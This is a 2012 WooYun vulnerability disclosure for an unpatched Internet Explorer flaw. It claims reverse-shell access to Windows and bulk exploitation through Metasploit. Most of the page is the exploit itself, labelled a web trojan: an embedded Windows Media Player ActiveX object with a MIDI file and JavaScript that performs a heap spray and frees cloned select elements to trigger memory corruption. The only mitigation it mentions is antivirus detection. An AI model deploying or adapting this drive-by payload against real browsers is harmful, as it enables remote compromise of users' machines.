当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04584

漏洞标题:IE存在未修复的可利用漏洞

相关厂商:微软

漏洞作者: code0day

提交时间:2012-02-17 10:14

修复时间:2012-02-17 10:14

公开时间:2012-02-17 10:14

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-02-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-02-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

可反弹SHELL,获取WINDOWS的权限,可使用MSF批量获取MSF>DB_AUTOPWN

详细说明:

IE 漏洞

漏洞证明:


以下是网马

<object id="midi1" classid="clsid:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#version=5,1,52,701" standby="loading microsoft windows media player components..." type="application/x-oleobject" width="320" height="310">
<param name="filename" value="./toto.mid">
     <param name="animationatstart" value="true">
     <param name="transparentatstart" value="true">
     <param name="autostart" value="false">
     <param name="showcontrols" value="true">
     <param name="ShowStatusBar" value="true">
     <param name="windowlessvideo" value="true">
     <embed src="./toto.mid" autostart="true" showcontrols="true" showstatusbar="1" bgcolor="white" width="320" height="310">
</object>
<script>
var cloned = new Array();
var numCloned = 50;
function bang()
{
	
	
	for (var i = 0; i < numCloned; i ++)
	{
		if ( cloned[i] != null )
		{
			var s = cloned[i].w0.toString();
			//alert(s);
		}
	}
}
function exploit()
{
	
	var selob = document.createElement("select");
	selob.w0 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");
	selob.w1 = this;
	selob.w2 = new Array();
	selob.w3 = true;
	selob.w4 = 0x41424344;
	selob.w5 = document.createElement("marquee");
	selob.w6 = undefined;
	selob.w7 = null;
	selob.w8 = alert;
	selob.w9 = RegExp.$1;
	selob.w10 = Infinity;
	selob.w11 = NaN;
	selob.w12 = new Date();
	
	for (var i = 12; i < 60; i ++)
	{
		selob["w"+i.toString()] = 0x41424344;
	}
	for (var i = 0; i < numCloned; i ++)
	{
		cloned[i] = selob.cloneNode(true);
	}
	
	for (var i = 1; i < numCloned; i += 7)
	{
		cloned[i] = null;
	}
	CollectGarbage();
	midi1.play();
	setTimeout(function(){bang();}, 5000);
}
setTimeout(function(){exploit();}, 3000);
</script>

修复方案:

官方暂未发布补丁,360可以防护。如果变形一下,就不知道了,没有做测试。企业网可得要注意喽。。。

版权声明:转载请注明来源 code0day@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)